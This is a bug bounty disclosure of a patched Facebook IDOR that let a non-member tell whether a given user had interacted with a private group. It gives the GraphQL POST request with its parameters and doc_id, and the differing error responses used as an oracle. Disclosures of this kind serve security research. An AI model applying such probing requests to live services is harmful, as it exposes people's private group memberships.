Marcos Ferreira

Published On: 27 Dec 2022

$3,000

Private Group Interaction Disclosure

IDOR
Facebook | Web
---
LOW VALID
Description

I've discovered a bug that allows a non-member to determine if a specific user has interacted with a private group.

Impact

This interaction could indicate that the user has visited, is currently a member, or was previously a private group member.




Reproduction Steps

Step
1

Send a POST request to graph.facebook.com/graphql with modified parameters for the group_id and user_id to check for group interaction.

variables= {"params":{"nt_context":{"using_white_navbar":true,"pixel_ratio":3,"styles_id":"0","bloks_version":"0"},"path":"groups/group_questions/","params":"{\"group_id\":0000,\"user_ID\":0000}","extra_client_data":{}},"scale":"3","nt_context":{"using_white_navbar":true,"pixel_ratio":3}}

doc_id=5055248221176502

Step
2

If the user has not interacted with the group, a return error message will be displayed on the response.

{"data":{"native_template_screen":null},"errors":[{"message":"A server error field_exception occured. Check server logs for details."

Step
3

However, if the user has previously interacted with the group, there will be no errors.

Timeline
.
Marcos 14 Jan 2022

Initial Report

.
Facebook 17 Jan 2022

Triaged Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation

.
Facebook 22 Jan 2022

Bug Fixed We have looked into this issue and believe that the vulnerability has been patched.

.
Facebook 23 Jan 2022

Bounty awarded It was possible to check if a specific user (based on User ID) interacted with a specific group (based on group ID)

VALID






Show All Images